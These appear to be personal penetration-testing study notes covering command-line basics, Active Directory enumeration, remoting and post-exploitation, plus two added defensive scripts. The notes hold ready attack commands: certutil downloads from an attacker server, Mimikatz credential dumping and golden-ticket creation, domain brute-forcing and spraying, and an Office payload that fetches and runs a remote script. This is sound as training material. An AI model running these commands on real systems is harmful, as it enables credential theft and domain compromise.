LINUX COMMAND LINE
- Use --help or -h to get help.
- List directory items with permissions with ls -al. Permissions are listed in the order owner - group - 'everyone else'.
- Commands: mkdir (make directory), mv file new_name (rename file), cp file new_copy (make a copy of a file), rm file (remove a file), rm -r directory (permanently remove a directory and its contents).
- Change permissions on a file or directory with chmod.
- Create a new file with touch.
- Edit files with nano or vim.
- Command wc counts the number of lines, words and characters/bytes in a file. Syntax: wc file_name. It prints the number of lines, words and characters, then the filename.
- Command "tr [a] [b] < file > new_file": replaces all instances of 'a' with 'b' in the file 'file' and writes the output to the new file 'new_file'.
- Command "sed 's/word/new_word/g' filename": prints the file 'filename' with all instances of 'word' replaced by 'new_word'.
- Command sudo: runs a command as root. "sudo -u username command" runs the command 'command' as the user 'username'.
- Command su: switches to the root user. "su username" switches to the user account 'username'.
- Command "ssh username@10.10.10.10": creates a secure SSH connection as user 'username' with password-based authentication.
- Command "ssh -i path-to-private-key username@system(or ip-address)": connects to the system as 'username' using public key authentication.
- Command "scp path-to-localfile user@system(or ip-address):path": copies the file to the remote location over the secure connection. scp runs on port 22 (the SSH port). To copy from the remote system to the local system, swap the order of path-to-localfile and user@system.
- If SSH on the remote system listens on a port other than the default 22, specify it with the -P argument: scp -P 2332 file.txt remote_username@10.10.100.23:/remote/directory/new_file_name.txt. Specifying a filename renames the file as it is transferred; without it the file keeps the name of the original.
- Command "find /directory -name filename": searches the directory '/directory' for the file 'filename'. find can also search for files belonging to a particular user, files with specific permissions, and files containing a particular character or string in their names. "find . -name Filename" searches for 'Filename' in the current directory; to search all directories use / as the starting point.
- Sort the output of a file or command with sort.
- Command "md5sum filename" generates the MD5 hash of the file 'filename'. sha1sum and sha256sum generate SHA-1 and SHA-256 hashes.
- Use the more command to read files on the Windows command line; the Linux equivalent is cat.
- The ping command needs the -c flag to set the number of requests to send and responses to receive (Windows: -n).
- traceroute usually sends 3 packets per hop.
- Start a listening server on port 9999: nc -nvlp 9999. Connect to the listening server on port 9999: nc server-ip-address 9999
- Passive reconnaissance using nslookup: nslookup -type=MX tryhackme.com. The dig command is usually used in a similar way.
- Discovering hosts in the same subnet requires ARP queries.
- Scan IP addresses from a list with nmap: nmap -iL list.txt
- View the list of IP addresses nmap would scan without scanning them: nmap -sL TARGETS. This also tries to DNS-resolve the addresses.
- Find live hosts without port scanning the targets: nmap -sn TARGETS (ping scan).
- Perform an ARP scan without port scanning: nmap -PR -sn TARGETS. The -PR option requests an ARP scan; this finds all live hosts on the subnet without port scanning.
- Discover hosts with an ICMP echo ping: nmap -PE TARGET. The -sn flag stops nmap from following up with a port scan (nmap -PE -sn TARGET).
- Discover hosts with a TCP SYN ping: nmap -PS21,80,443 -sn MACHINE/24.
  (Needs to be run as a privileged user [root, sudoers] so that nmap does not complete the 3-way handshake when the port is open.)
- Discover hosts with a TCP ACK ping: nmap -PA21,443,67 -sn TARGET (needs to be run as a privileged user [root, sudoers] so that nmap does not complete the 3-way handshake when the port is open).
- The above TCP discovery commands should always be followed by the port number(s) or
- Discover hosts with a UDP ping: nmap -PU -sn TARGET. A UDP ping to a closed port returns ICMP destination unreachable (port unreachable); a UDP ping to an open port returns nothing.
- Renaming a file: mv old-filename new-filename

POWERSHELL
- Every output in PowerShell is an object and can be manipulated with the pipe operator.
- Use the cmdlet Get-Help to get information about a command, e.g. "Get-Help Get-Command" shows the help for the command Get-Command. Adding -Examples ("Get-Help Get-Command -Examples") shows different examples of how Get-Command is used.
- Command "Get-Help *process" lists everything (cmdlets etc.) whose name contains the word process.
- "Get-Process | Sort-Object -Property ID" returns the processes on the PC and sorts the output objects by the ID property.
- Set-Content, Get-Content and Add-Content create/overwrite files, read from files, and append content to an existing file respectively. "Set-Content -Value "This is a test" -Path ./test.txt" creates a file and writes the specified content to it; it can later be read with Get-Content.
- "Get-Module -ListAvailable" shows all available modules.
- "Get-Module PSReadline -ListAvailable" shows the PSReadline module and the functions it exports.
- "Import-Module -Name 'PSReadline'" imports the module by name, while "Remove-Module -Name 'PSReadline'" removes the module by name.
- "Get-EventLog -List" lists the available logs, while "Get-EventLog System" shows all entries of a specific log.
- "Get-EventLog -LogName System -Newest 1000 | Group-Object -Property Source -NoElement | Sort-Object -Property Count -Descending": gets the newest 1000 System log entries, groups them by the Source property, then sorts the groups by count in descending order.
- Check out the five different ways to bypass the Restricted execution policy in PowerShell.
- Most common aliases for DOS-style commands: Get-Content: type; Get-ChildItem: dir; Copy-Item: copy; Remove-Item: del; Move-Item: move.
- "Get-Alias *d*": returns all aliases which contain the letter d.
- "Help Set-Content -ShowWindow": displays the help in a cleaner, separate window.
- The $env: prefix is used to set and retrieve environment variables.
- A process queries the TEMP environment variable to find a suitable location for temporary files. The HOME or USERPROFILE environment variables are used to find the directory structure owned by the user running the process.
- Find the security/password policies for a Windows computer or server: Start -> secpol
- Task Scheduler stores the metadata that defines the context in which actions are executed in .job files located in the Tasks folder. Malware installs itself as a series of scheduled tasks to ensure persistence. Run Task Scheduler with Start -> taskschd.msc
- Command Get-Alias lists the different aliases which have been set up.
- Piping a command to more produces the output page by page.
- Find the parameters of a command, e.g. Get-Command: "Get-Help Get-Command -Parameter *"
- Find all the cmdlets with the word process in their names: "Get-Command -CommandType cmdlet -Name *process*"
- Cmdlets in PowerShell follow a verb-noun naming convention. To find the cmdlets which stop something: "Get-Command -Verb stop"
- "python -m http.server 1234" spins up a web server in the current directory on port 1234.
- "$myVariable = Get-ChildItem C:\Windows" stores the output in a variable; typing "$myVariable" prints it.
- Format output differently by piping it to the Format commands: Get-ChildItem | Format-Table. View the different Format commands: Get-Command -CommandType cmdlet -Name Format*
- Piping to Out-GridView prints the output in a clean, independent grid window: Get-ChildItem | Out-GridView
- Comparison operators used by PowerShell: -eq, -ne, -gt, -lt, -le, -ge, -match, -notmatch, -replace, -like, -notlike, -in, -notin, -contains, -notcontains.
- "hello world" -match "World" returns True (-match is case-insensitive by default).
- Advanced operators: -and, -or, -xor, -not, -split, -join, -is, -isnot, -as.
- "a string: $str" (double quotes, $str is expanded) is not the same as 'a string: $str' (single quotes, taken literally).
- To return a variable's type: $str.GetType()
- $array = 1, 2, "hi", 3 creates an array. To create an empty array: $array = @()
- List all available modules: Get-Module -ListAvailable -All | more
- View the cmdlets which accept a ComputerName parameter: "Get-Command -CommandType cmdlet -ParameterName ComputerName"
- Return the cmdlets which take the ComputerName and Credential parameters but not the Session parameter: "Get-Command -CommandType cmdlet | Where-Object {$_.Parameters.Keys -contains 'ComputerName' -and $_.Parameters.Keys -contains 'Credential' -and $_.Parameters.Keys -notcontains 'Session'}"
- The expression $_ represents the current object in the pipeline, as in the command above.
- View the members of the objects cmdlets return: "Get-Command -CommandType cmdlet | Get-Member"
- Test the connection to multiple machines or domains: "foreach ($pc in ('domainpc', 'localhost', 'google.com')) {Test-Connection $pc}"
- PowerShell remoting is based on the WS-Management (WSMAN) protocol and uses WinRM. It operates on port 5985 for HTTP and 5986 for HTTPS (recommended).
- For PowerShell remoting, the user needs admin access on the remote machine (in a trusted domain). The user does not need to be the built-in Administrator but can be a member of the local Administrators group. Remoting also needs to be enabled on the target environment to be used.
- From Server 2012 onwards, PowerShell remoting is enabled by default.
- If the attacker machine is in a workgroup or not part of the target machine's domain, you need to tell your machine to trust the target machine or network, because the attacker machine sends its credentials when remoting: "Set-Item WSMan:\localhost\client\trustedhosts -Value *". The wildcard trusts everyone. Remember this needs to be run from an elevated shell.
- View the trusted hosts of the attacker machine: "Get-Item WSMan:\localhost\client\trustedhosts"
- A PSSession is an interactive session in PowerShell.
- Create a new PS session on the target: "New-PSSession -ComputerName domainpc -Credential bharat\"
- View available PS sessions: "Get-PSSession" (version 2). View the available PS sessions to a particular computer: "Get-PSSession -ComputerName domainpc" (version 3).
- View the PowerShell version: "$PSVersionTable"
- Enter a PSSession: Enter-PSSession -Id 1
- The process "wsmprovhost" always starts on the target when PowerShell remoting is used.
- It is never a good idea to leave PS sessions open on a target. Use the command "Remove-PSSession".
- It is also difficult to execute PowerShell scripts through a PSSession; this can be done with "Invoke-Command".
- Invoke-Command runs commands or scripts on a remote computer and returns all output.
- Run a batch of commands on a remote computer: "Invoke-Command -ScriptBlock {whoami; (Get-Host).Version; Get-Process} -ComputerName domainpc -Credential bharat\domain"
- Execute a PowerShell script on a remote machine: "Invoke-Command -FilePath C:\PFPTHelloWorld.ps1 -ComputerName domainpc -Credential bharat\domainpc". This converts the .ps1 file at the path into a script block and executes it on the remote machine like the command above.
- A module cannot be executed remotely the same way as a script. Import the module locally first, then run one of its functions through the function: drive: start with "Import-Module .\Powerpreter.psm1", then run remotely: "Invoke-Command -ScriptBlock ${function:Get-WLAN-Keys} -ComputerName domainpc -Credential bharat\domain"
- A PSSession can be used with only a single machine at a time (one-to-one), while Invoke-Command can execute on several machines at once.
- Remote execution via Invoke-Command is stateless: a value assigned to a variable cannot be used in a subsequent command. To make it stateful, create a session and run the command and the subsequent command on that same session: create the session with New-PSSession and assign it to a variable ("$Sess = Get-PSSession"), then run "Invoke-Command -ScriptBlock {$procs = Get-Process} -Session $Sess" followed by "Invoke-Command -ScriptBlock {$procs} -Session $Sess". The second command now returns the value of the $procs variable.
- Commands can be executed implicitly on a remote system by creating a function in a PSSession and then using Import-PSSession to create a local command which runs in that session for as long as the session lives. Create the function in the session (assuming the session has already been created and assigned to $Sess): "Invoke-Command -ScriptBlock {function Get-Sysinfo {whoami; $env:Computername}} -Session $Sess". Explicit remoting: "Invoke-Command -ScriptBlock {Get-Sysinfo} -Session $Sess". Use Import-PSSession to create the command for implicit remoting: "Import-PSSession -CommandName Get-Sysinfo -Session $Sess". Implicit remoting is then performed by just running "Get-Sysinfo".
- Export the above command to a module: "Export-PSSession -ModuleName domainmodule -CommandName Get-Sysinfo -Session $sess"
- To get access to a machine which is not directly connected to our attacker machine, run the following commands on the attacker machine and on the connected target machine, which forwards credentials to the third machine we have no direct access to. Run on the attacker: Enable-WSManCredSSP -Role Client (allows delegating credentials to targets). Run on the connected target: Enable-WSManCredSSP -Role Server (allows the server to accept user credentials from a remote computer). View the credential delegation configuration: Get-WSManCredSSP
- Start a job to execute a command: "Start-Job -ScriptBlock {whoami}"
- Execute a .ps1 file via a job: "Start-Job -FilePath .\HelloWorld.ps1"
- Execute jobs remotely: "Invoke-Command -ScriptBlock {ps} -ComputerName domainpc -Credential bharat\domainuser -AsJob". Could also be done this way: "Invoke-Command -ScriptBlock {Start-Job -ScriptBlock {ps}} -ComputerName domainpc -Credential bharat\domain -AsJob". Worth noting these jobs run statefully.
- View the output of an executed job: "Get-Job -Id 14 | Receive-Job"
- WMI (Windows Management Instrumentation) is used to access management information across platforms in an enterprise. Admins use it to manage the different machines in an enterprise environment. WMI contains namespaces, which are collections of classes that hold objects of different kinds.
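The TrustedHosts wildcard and CredSSP delegation described above are exactly the settings a defender should audit on any host where WinRM is enabled. The script below is an added example written for these notes (not Nishang, PowerSploit or any other project's code). It assumes an elevated PowerShell on a Windows host with WinRM installed; the Keys-based listener check is an assumption about how the WSMan: drive exposes listeners, and the host name 'jump01' is a placeholder.

```powershell
# Added example, not from the original notes. Audits the WinRM settings the
# notes change (TrustedHosts wildcard, CredSSP delegation) and applies a
# tightened baseline. Assumes an elevated PowerShell on Windows with WinRM.

function Get-WinRMTrustIssue {
    [CmdletBinding()]
    param()

    $issues = New-Object System.Collections.Generic.List[string]

    # TrustedHosts '*' makes this client send its credentials to any host that
    # answers on 5985/5986, including a rogue one.
    $trusted = (Get-Item WSMan:\localhost\Client\TrustedHosts).Value
    if ($trusted -match '(^|,)\s*\*') {
        $issues.Add("Client TrustedHosts contains a wildcard: '$trusted'")
    }

    # CredSSP (Enable-WSManCredSSP -Role Client/Server in the notes) hands the
    # remote host reusable credentials; keep it off unless a second hop is required.
    $clientCredSSP  = (Get-Item WSMan:\localhost\Client\Auth\CredSSP).Value
    $serviceCredSSP = (Get-Item WSMan:\localhost\Service\Auth\CredSSP).Value
    if ($clientCredSSP -eq 'true')  { $issues.Add('Client CredSSP delegation is enabled') }
    if ($serviceCredSSP -eq 'true') { $issues.Add('Service accepts CredSSP delegated credentials') }

    # Unencrypted WinRM should never be allowed.
    $unencrypted = (Get-Item WSMan:\localhost\Service\AllowUnencrypted).Value
    if ($unencrypted -eq 'true') { $issues.Add('Service allows unencrypted WinRM traffic') }

    # Assumption: listener items under WSMan:\localhost\Listener expose a Keys
    # array such as @('Address=*', 'Transport=HTTP'). The notes recommend 5986/HTTPS.
    $listeners = @(Get-ChildItem WSMan:\localhost\Listener)
    $hasHttps  = $listeners | Where-Object { $_.Keys -contains 'Transport=HTTPS' }
    if ($listeners.Count -gt 0 -and -not $hasHttps) {
        $issues.Add('Only HTTP (5985) listeners are configured; no HTTPS listener')
    }

    return ,$issues
}

function Set-WinRMTrustBaseline {
    # Replaces the wildcard with an explicit host list and turns delegation off.
    [CmdletBinding(SupportsShouldProcess)]
    param(
        [Parameter(Mandatory)][string[]]$AllowedHosts   # e.g. 'jump01', '10.0.0.5'
    )

    $hostList = $AllowedHosts -join ','
    if ($PSCmdlet.ShouldProcess('WSMan:\localhost\Client\TrustedHosts', "set to '$hostList'")) {
        Set-Item WSMan:\localhost\Client\TrustedHosts -Value $hostList -Force
    }
    if ($PSCmdlet.ShouldProcess('CredSSP', 'disable client and server delegation')) {
        Disable-WSManCredSSP -Role Client
        Disable-WSManCredSSP -Role Server
    }
    if ($PSCmdlet.ShouldProcess('WSMan:\localhost\Service\AllowUnencrypted', 'set to false')) {
        Set-Item WSMan:\localhost\Service\AllowUnencrypted -Value 'false'
    }
}

# Usage: report first, then preview the baseline with -WhatIf before applying it.
$findings = @(Get-WinRMTrustIssue)
if ($findings.Count -eq 0) {
    Write-Output 'No WinRM trust issues found.'
} else {
    $findings | ForEach-Object { Write-Output "FINDING: $_" }
}
Set-WinRMTrustBaseline -AllowedHosts 'jump01' -WhatIf
```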
- Explore namespaces: "Get-WmiObject -Namespace "root" -Class "__Namespace"". To list only the names: "Get-WmiObject -Namespace "root" -Class "__Namespace" | Select-Object Name"
- Explore all the classes available in WMI: "Get-WmiObject -Namespace "root/cimv2" -List"
- Explore methods: "Get-WmiObject -Class Win32_Process -List | Select-Object -ExpandProperty Methods"
- List all the processes in the Win32_Process class: "Get-WmiObject -Class Win32_Process". To execute it remotely: "Get-WmiObject -Class Win32_Process -ComputerName domainpc -Credential bharat\domain"
- Filter the results on the Name property: "Get-WmiObject -Class Win32_Process -Filter {Name = "powershell.exe"}". This could also be done with Where-Object: "Get-WmiObject -Class Win32_Process | Where-Object {$_.Name -eq "powershell.exe"}", or with the Query parameter: "Get-WmiObject -Query {Select * from Win32_Process where Name = "powershell.exe"}". To stop the process, pipe the result to Remove-WmiObject: "Get-WmiObject -Class Win32_Process -Filter {Name = "powershell.exe"} | Remove-WmiObject"
- COM objects are interfaces to various Windows applications.
- Check if the registry hives have been loaded as drives: "Get-PSProvider -PSProvider Registry"

SUBDOMAIN ENUMERATION
- Three methods are used for subdomain enumeration: OSINT, brute forcing and virtual hosts. OSINT is done with the help of Google hacking dorks and by checking SSL/TLS certificates with the help of search engines. Brute forcing is done with tools like DNS Bruteforce and Sublist3r.

APPLICATION BYPASS
- Usernames can be enumerated with the ffuf tool, which uses a word list of commonly used usernames and checks against the target website whether matches exist. ffuf can then be used for a brute-force attack on the confirmed usernames.
WEB APPLICATION VULNERABILITIES
- Several web application attacks arise from vulnerabilities like path traversal, Local File Inclusion (the attacker includes a payload in the fetched URL and is able to read or modify files on the target server and/or navigate through directories) and Remote File Inclusion (the attacker hosts their own server and includes its path in the URL to the target server, so that the target server visits it, fetches the payload and executes it).
- Common remediation steps: keep systems/frameworks up to date, turn off server application error output, use a WAF, disable the PHP features that cause file inclusion vulnerabilities (allow_url_fopen and allow_url_include), never trust user input, implement whitelisting and blacklisting for file names and locations.
- Server Side Request Forgery is a vulnerability where an attacker causes the web server to make additional HTTP requests to a resource of the attacker's choosing. Two types: regular and blind.
- Read https[:]//blog.aghanim.net/?p=1120 for the final challenge.

POWERVIEW ENUMERATION
- NT AUTHORITY\SYSTEM is a powerful account on Windows systems with unrestricted access to all local system resources. It is a member of the Administrators group on the local computer.
- Bypass the execution policy before running the PowerView script: powershell -ep bypass
- View information about the different users in the domain: Get-NetUser. Can be piped to other cmdlets such as select to view specific properties of the enumerated users: Get-NetUser | select cn, objectsid, adspath
- Get the different groups in the domain: Get-NetGroup. To enumerate the groups of a particular domain when there are several domains: Get-NetGroup -Domain DOMAIN-NAME.local
- Enumerate the groups which are administrator groups: Get-NetGroup -AdminCount
- Get all the groups a particular user is a member of: Get-NetGroup -UserName Admin2
- Get all the users that are members of a particular group: Get-NetGroupMember -GroupName "Administrators"
- Get all the computers which are part of the domain: Get-NetComputer. Get the computers which are currently online: Get-NetComputer -Ping. Get full operating system information for the computers: Get-NetComputer -FullData, which can be piped to view specific properties: Get-NetComputer -FullData | select cn, operatingsystem (shows each computer name and its operating system)
- View the domain information: Get-NetDomain. Can also use Get-NetDomainController
- View the domain SID: Get-DomainSID
- View the domain policy: Get-DomainPolicy
- When a domain controller has been compromised, view the different machines you can access with administrative privileges: Find-LocalAdminAccess (only computers which are currently online)
- Another command to view the local admins: Invoke-EnumerateLocalAdmin
- View the different group policies: Get-NetGPO. Can be piped to view specific properties: Get-NetGPO | select displayname, whencreated
- Enumerate users currently logged on to the domain controller: Get-NetLoggedOn. Add -ComputerName to target a particular computer: Get-NetLoggedOn -ComputerName Domain-Controller.CONTROLLER.local
- Enumerate the last person to log on: Get-LastLoggedOn. Again, -ComputerName targets a particular computer: Get-LastLoggedOn -ComputerName Domain-Controller.CONTROLLER.local
- View any current RDP sessions: Get-NetRDPSession. Sessions on a particular computer: Get-NetRDPSession -ComputerName Domain-Controller.CONTROLLER.local
- Find shares on the domain controller: Invoke-ShareFinder
- Once shares are found, operations like enumerating the contents of the shared folders are possible. For example a share displayed as "\\Win10.mayorsec.local\C$" could be listed with "ls \\WIN10\C$" and, depending on the contents, "ls \\WIN10\C$\users". The user needs to be authorised to view the contents.
- Enumerate the local admins on every domain-joined workstation in the domain: "Invoke-EnumerateLocalAdmin". Bear in mind that once you are domain admin you are also a local admin on those machines by default.
- Given the large number of ACLs in a domain, it is always helpful to enumerate with filters, for example: "Get-ObjectAcl -SamAccountName "engineering" -ResolveGUIDs". If the results show that a group has GenericAll rights over another group, for example the Sales group having these rights over Engineering, then a member of Sales can add members to the Engineering group: "net group Engineering s.chisholm /add /domain", or remove a user with the "/del" keyword instead of /add.

BLOODHOUND ENUMERATION
- BloodHound is the visualisation tool, while SharpHound is the data collector, written in C#, which uses Windows native functions and LDAP namespace functions to collect data from DCs and domain-joined Windows systems.
POST EXPLOITATION: TRANSFERRING FILES TO WINDOWS TARGETS
- certutil is a cmd program used to dump CA configuration information.
- certutil with the -urlcache parameter in conjunction with the -f option fetches (downloads) a file from a remote server. Watch out for outgoing connections being blocked when working in lab or restricted environments.
- Once files are served on the server, use: certutil -urlcache -f http://ip-or-name-of-server/file-to-download
- WinPEAS (Windows Privilege Escalation Enumeration Awesome Script) identifies vulnerabilities in the operating system (kernel) and misconfigurations which could let an attacker elevate privileges on the local system and eventually the network.
- Command "whoami /priv" shows the different privileges the logged-in user has on the system.
- Hotfixes on Windows help identify the patch level of the system. They give information about which vulnerabilities the installed hotfixes patch.
- Windows Exploit Suggester is another tool (a Python script) which takes the system information (output of the systeminfo command) saved in a file, together with a vulnerability database, and lists the vulnerabilities for that particular version of Windows. Command: windows-exploit-suggester.py --database database-file.xls --systeminfo systeminfo-file.txt

POST EXPLOITATION: MANUAL ENUMERATION
- Command whoami /priv: view privileges and what we are allowed to do.
- Enumerate the groups the current user is part of: whoami /groups
- Enumerate other user accounts on the target system: net users
- Find more information about a user that was found: net user Admin2
- Enumerate the groups on the system: net localgroup
- Enumerate a group which has been found: net localgroup "Remote Desktop Users"
- Display the hostname: hostname
- Enumerate system information: systeminfo
- Use the Windows Management Instrumentation utility (wmic) to enumerate hotfix IDs and when they were installed: wmic qfe
- Enumerate the services currently running: tasklist /SVC
- Enumerate network information: ipconfig /ALL
- Print the routing table: route print
- Enumerate the ports which are active and listening: netstat -ano
- Identify whether Windows Defender is enabled: sc query windefend. If STATE is STOPPED, it is disabled.
- Check whether the Windows firewall is active: netsh firewall show state. If Operational mode is Disable, it is disabled.

POST EXPLOITATION: MIMIKATZ
- Mimikatz requires administrative privileges.
- Check privileges in Mimikatz: privilege::debug. A response of 20 indicates you are running as administrator.
- From Windows Server 2012 onwards, clear-text passwords and LM hashes are no longer stored in memory. On older versions the command to dump these passwords is: sekurlsa::logonpasswords
- Dump the contents of the SAM database: lsadump::sam
- LSA stands for Local Security Authority; it manages the system's local security policy and stores data for user accounts such as user logins, authentication of users and their user secrets.
- Because LM hashes and passwords are no longer stored in memory, use the lsadump command with the /patch flag: lsadump::lsa /patch
- Once you have the NTLM hash, crack it with the hashcat tool and a wordlist: hashcat -m 1000 ntlm-hash word-list.txt
- The krbtgt account is a local account used for ticket distribution during authentication. To create a golden ticket you need the krbtgt account SID and NTLM hash and the ID of the Admin user (500). Command to get this information: lsadump::lsa /inject /name:krbtgt
- Create the golden ticket (to gain cmd access to other systems in the network): kerberos::golden /user:(user-currently-logged-in) /domain:controller.local /sid:S-1-5-21-849420856-2351964222-986696166 /krbtgt:ntlm-hash /id:500

POST EXPLOITATION: PERSISTENCE WITH METASPLOIT

POST EXPLOITATION: WINPEAS
- Enumerate only user information: winpeas.exe userinfo

HOST DISCOVERY
- List the commands available in the Nishang module: "Get-Command -Module Nishang"
- Port scan and resolve host names with Nishang: "Port-Scan -StartAddress 192.168.0.1 -EndAddress 192.168.0.20 -ResolveHost"
- Ping-only host discovery with the PowerSploit port scanner (start by importing the module): "Invoke-Portscan -Hosts google.com -PingOnly"
- List the commands available in PowerSploit: "Get-Command -Module PowerSploit"
- Import Posh-SecMod; it contains a useful function for ARP scanning.
- ARP scan to find machines available on the local network: "Invoke-ARPScan -CIDR 192.168.254.0/24"

PORT SCANNING
- Scan ports with Nishang: "Port-Scan -StartAddress x.x.x.x -EndAddress x.x.x.x -ScanPort"
- Worth noting Invoke-Portscan is faster than Nishang's Port-Scan because it is multithreaded.
- Assign the above output to a variable ($result) and filter through it for detailed output: "$result | Select-Object -ExpandProperty filteredPorts"
- Enumerate SRV records in Active Directory environments with Posh-SecMod (SRV records are part of the DNS information and give the services, hostnames and ports on which those services run): "Invoke-EnumSRVRecords -Domain google.com"
- Posh-Shodan can be used to check the existence of files and directories in AD environments. Start by importing Posh-Shodan. View the available commands with "Get-Command -Module Posh-Shodan"
- The API key is passed to every command, or, to keep your key private, set the API key once with a master password via the command "Set-ShodanAPIKey"
- Resolve a hostname with Posh-Shodan: "Get-ShodanDNSResolve -Hostname google.com"
- Check the number of devices matching the string "default password": "Measure-ShodanHost -Query "default password" -City Mumbai"
- List the services available through Shodan: "Get-ShodanService"
- Instead of loading an entire module you can dot-source a single script: ". .\PowerSploit\Recon\Get-HttpStatus.ps1" loads the Get-HttpStatus script. Then run it: "Get-HttpStatus -Target newpc -Path .\PowerSploit\Recon\Dictionaries\generic.txt -Port 80". Filter the results by status OK: " | Where-Object {$_.Status -match "ok"}"
- The .NET framework greatly extends the functionality of PowerShell.
- Module used for vulnerability scanning and analysis: "Posh-NVS"
- After using the tool above to scan and save the output to XML files, use Parse_Nmap to parse the XML results: ".\Parse_Nmap.ps1 -Path .\xml_output_filename -RunStatsOnly"
- To parse the XML files manually: "$nmap = [xml](Get-Content .\filename)", then run "$nmap" to view the content, which shows the nmaprun element. Then run "$nmap.nmaprun | Get-Member" to view the different properties you can query for information.
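Carrying the manual [xml] parsing above through to something usable: the script below is an added example written for these notes (it is not Parse_Nmap.ps1 or any other project's code). It walks the nmaprun tree into one object per port, handles hosts with several address elements or no resolved hostname, and reproduces the -RunStatsOnly summary. The XML is constructed for the example, not a real scan.

```powershell
# Added example, not from the original notes: parse nmap -oX output with the
# [xml] cast the notes describe, but into one object per scanned port so the
# result can be filtered and grouped like any other PowerShell output.
# The XML below is constructed for this example (not a real scan).

$NmapXmlSample = @'
<?xml version="1.0" encoding="UTF-8"?>
<nmaprun scanner="nmap" args="nmap -sS -p 22,80,443,3389 -oX scan.xml 192.168.56.0/29" version="7.94">
  <host>
    <status state="up" reason="arp-response"/>
    <address addr="192.168.56.10" addrtype="ipv4"/>
    <address addr="08:00:27:AA:BB:CC" addrtype="mac"/>
    <hostnames><hostname name="web01.lab.local" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="22"><state state="open" reason="syn-ack"/><service name="ssh"/></port>
      <port protocol="tcp" portid="80"><state state="open" reason="syn-ack"/><service name="http"/></port>
      <port protocol="tcp" portid="443"><state state="closed" reason="reset"/><service name="https"/></port>
      <port protocol="tcp" portid="3389"><state state="filtered" reason="no-response"/><service name="ms-wbt-server"/></port>
    </ports>
  </host>
  <host>
    <status state="up" reason="arp-response"/>
    <address addr="192.168.56.11" addrtype="ipv4"/>
    <hostnames/>
    <ports>
      <port protocol="tcp" portid="3389"><state state="open" reason="syn-ack"/><service name="ms-wbt-server"/></port>
    </ports>
  </host>
  <runstats>
    <finished elapsed="5.12" summary="2 IP addresses (2 hosts up) scanned in 5.12 seconds"/>
    <hosts up="2" down="6" total="8"/>
  </runstats>
</nmaprun>
'@

function ConvertFrom-NmapXml {
    # Returns one object per port entry: host, hostname, port, state, service.
    param([Parameter(Mandatory)][string]$XmlText)

    $run = ([xml]$XmlText).nmaprun
    foreach ($h in @($run.host)) {
        # <address> may be one element or an array (ipv4 plus mac); pick the IPv4.
        $ipv4 = @($h.address) | Where-Object { $_.addrtype -eq 'ipv4' } |
                Select-Object -First 1 -ExpandProperty addr
        # <hostnames/> comes back as an empty string when nmap could not resolve the host.
        $name = $null
        if ($h.hostnames -is [System.Xml.XmlElement]) {
            $name = @($h.hostnames.hostname)[0].name
        }
        foreach ($p in @($h.ports.port)) {
            if ($null -eq $p) { continue }     # host had no port entries at all
            [pscustomobject]@{
                Host      = $ipv4
                Hostname  = $name
                HostState = $h.status.state
                Protocol  = $p.protocol
                Port      = [int]$p.portid
                PortState = $p.state.state
                Service   = $p.service.name
            }
        }
    }
}

function Get-NmapRunStats {
    # The -RunStatsOnly view from the notes: hosts up/down/total and elapsed time.
    param([Parameter(Mandatory)][string]$XmlText)
    $stats = ([xml]$XmlText).nmaprun.runstats
    [pscustomobject]@{
        Up      = [int]$stats.hosts.up
        Down    = [int]$stats.hosts.down
        Total   = [int]$stats.hosts.total
        Elapsed = [double]$stats.finished.elapsed
    }
}

# Usage: open ports only, grouped per service with the Group-Object pattern
# used earlier in these notes, followed by the run statistics.
$ports = ConvertFrom-NmapXml -XmlText $NmapXmlSample
$open  = $ports | Where-Object { $_.PortState -eq 'open' }
$open | Format-Table Host, Hostname, Port, Service -AutoSize
$open | Group-Object Service -NoElement | Sort-Object Count -Descending
Get-NmapRunStats -XmlText $NmapXmlSample
```

For a real scan, replace $NmapXmlSample with Get-Content -Raw on the -oX file; the exposed-service list is the same data a defender compares against the expected allow-list for each host.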
  Example: "$nmap.nmaprun.host.status"

BRUTE-FORCE
- To brute-force successfully, the attacking machine must be part of the target domain. Remember this technique brute-forces the domain controller itself, hence it is noisy with a high chance of getting caught.
- Assuming you have access to a machine in the target domain, create a PSSession, download the brute-forcing script and load it: ". .\BruteForce"
- Brute-force the Administrator account with password "Password1": "Brute-Force -Identity Bharat -UserName Administrator -Password Password1 -Service ActiveDirectory"
- This brute-force script could also be used to get the credentials of non-administrative users. Brute-forcing with a password wordlist: "cat .\password_wordlist.txt | Brute-Force -Identity Bharat -UserName Administrator -Service ActiveDirectory". Password spraying over a text file of enumerated users: "cat .\username_wordlist.txt | Brute-Force -Identity Bharat -Password Password1 -Service ActiveDirectory"
- The same script can brute-force an SQL service: "Brute-Force -Identity domainpc -UserName user1 -Password password1 -Service SQL". The Identity parameter and value could be replaced with "-ComputerName domainpc". The syntax for brute-forcing from a wordlist or password spraying is the same as above. Remember to always store the results in a variable so specific information or datasets can be parsed out.
- The same approach works for brute-forcing FTP and SharePoint.
- Note that using the tools "Get-WinRMPassword" and "Get-WmiPassword" does not require the attacking machine to be in the same domain; they cannot be used to brute-force administrative users. Run ". .\Get-WinRMPassword.ps1" then run "Get-WinRMPassword -ComputerName domainpc -username bharat\domainuser -wordlist ..\wordlist_name.txt -Verbose"
- After brute-forcing the credentials of the MSSQL server running on the target machine, use the "Execute-Command-MSSQL.ps1" script. Load it with ". .\nishang\Execution\Execute-Command-MSSQL.ps1" then run "Execute-Command-MSSQL -ComputerName domainpc -Username user -Password password1". This attempts to open a PowerShell, SQL or cmd shell on the target computer.

CLIENT SIDE ATTACKS
- Can be implemented with two Nishang tools, "Out-Word" and "Out-Excel", which generate Word or Excel files carrying payloads.
- Example: "Out-Excel -Payload "powershell.exe -noexit -c Get-Service"" creates a file with a malicious payload which, as seen in this command, opens a PowerShell shell and executes the command Get-Service.
- Different payloads exist: "Out-Excel -PayloadURL http[:]//192.168.0.1/speak.ps1 -Arguments "Speak 'You have been hacked'"" goes to the supplied URL, downloads the script speak.ps1 and executes it. We do not get macro warnings when running the above payloads because the Out-Excel script disables macro security in order to access VBA in Excel files programmatically. VBA is the programming language used to automate tasks in the Office suite of applications and to create macros. According to the script's code, add the "-RemainSafe" parameter to re-enable macro security after running the payload.
- The Out-CHM.ps1 script does not need powershell.exe in the payload because it is already part of the script's code. HTML Help Workshop is also needed on the attack machine.
